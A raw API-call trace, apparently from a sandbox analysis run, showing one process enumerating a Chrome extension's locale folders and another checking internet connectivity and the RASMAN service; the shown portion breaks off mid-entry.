| 07:44:24,410 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\ca\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,410 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x19\x94k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\x90\x19\x94k\xe0\x91\xcf\x01\x90\x19\x94k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x19\x94k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01B\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,410 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,410 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,490 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\cs\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,490 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\xa0\x95k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xc0\xa0\x95k\xe0\x91\xcf\x01\xc0\xa0\x95k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa0\x95k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01K\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,490 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,490 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,570 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\da\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0'\x97k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xf0'\x97k\xe0\x91\xcf\x01\xf0'\x97k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0'\x97k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01<\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,570 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,650 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\de\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,650 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xaf\x98k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01P6\x9ak\xe0\x91\xcf\x01P6\x9ak\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P6\x9ak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x013\x01\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,650 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,650 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,730 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\el\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,730 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P6\x9ak\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01P6\x9ak\xe0\x91\xcf\x01P6\x9ak\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P6\x9ak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01y\x01\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,730 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,730 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,870 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:24,870 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:24,890 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:24,890 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:24,890 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:24,950 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\en\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,950 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xbd\x9bk\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xb0D\x9dk\xe0\x91\xcf\x01\xb0D\x9dk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0D\x9dk\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01:\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,950 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,950 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,030 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\en_GB\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,030 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0D\x9dk\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xb0D\x9dk\xe0\x91\xcf\x01\xb0D\x9dk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0D\x9dk\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01:\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,030 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,030 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,111 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\en_US\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,111 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xcb\x9ek\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xe0\xcb\x9ek\xe0\x91\xcf\x01\xe0\xcb\x9ek\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xcb\x9ek\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01:\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,111 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,111 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,191 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\es\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,191 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xda\xa1k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01@\xda\xa1k\xe0\x91\xcf\x01@\xda\xa1k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xda\xa1k\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01H\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,191 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,191 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,271 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\es_419\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,271 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xda\xa1k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xa0\xe8\xa4k\xe0\x91\xcf\x01\xa0\xe8\xa4k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xe8\xa4k\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01I\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,271 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,271 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,351 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\et\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,351 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0o\xa6k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\xd0o\xa6k\xe0\x91\xcf\x01\xd0o\xa6k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0o\xa6k\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01:\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,351 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,351 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,431 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\fi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,431 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0o\xa6k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\x00\xf7\xa7k\xe0\x91\xcf\x01\x00\xf7\xa7k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\xa7k\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x011\x01\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,431 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,431 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,511 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\fil\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,511 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xf7\xa7k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01`\x05\xabk\xe0\x91\xcf\x01`\x05\xabk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x05\xabk\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01Q\x01\x00\x00\x00\x00\x00\x00X\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,511 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,511 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,591 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\fr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,591 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x05\xabk\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01`\x05\xabk\xe0\x91\xcf\x01`\x05\xabk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x05\xabk\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01E\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,591 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,591 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,671 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\he\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,671 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x8c\xack\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\x90\x8c\xack\xe0\x91\xcf\x01\x90\x8c\xack\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x8c\xack\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01W\x01\x00\x00\x00\x00\x00\x00X\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,671 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,671 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,691 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:25,691 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:25,691 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172940 | |
| 07:44:25,691 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172940 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x001727f8 | |
| 07:44:25,691 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:25,691 | 1308 | NtQueryInformationFile |
